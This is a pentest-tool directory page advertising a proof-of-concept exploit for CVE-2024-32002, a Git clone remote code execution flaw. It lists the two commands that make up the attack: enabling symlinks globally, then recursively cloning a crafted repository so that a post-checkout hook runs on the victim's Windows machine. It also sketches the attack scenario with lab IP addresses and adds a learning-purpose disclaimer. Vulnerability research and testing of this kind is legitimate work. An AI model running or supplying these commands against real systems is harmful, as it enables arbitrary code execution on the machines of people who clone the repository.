Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
git_rce — Git clone Remote Code Execution exploit | Kitploit
Tools/GitHubGitHub/eqstlab/git_rce
Vulnerability AnalysisExploitationPenetration TestingRed Teaming
GitHubeqstlab/git_rce

git_rce

Git clone Remote Code Execution exploit

View Repository
51 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-32002 PoC

  1. You must set up the git's symbolic link option like:
root@kitploit:~
git config --global core.symlinks true
  1. Then exploit CVE-2024-32002 by the following command:
root@kitploit:~
git clone --recursive https://github.com/EQSTSeminar/git_rce.git

Attack Scenario

kali(192.168.216.129) --Give remote repository address--> Win(192.168.216.130)

kali(192.168.216.129) <--Git clone && hook script(post-checkout) execution-- Win(192.168.216.130)

Disclaimer

This repository is not intended to be git clone RCE exploit to CVE-2024-32002. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.

Analysis

https://skshieldus.com/eng/business/insight.do#

Download Tool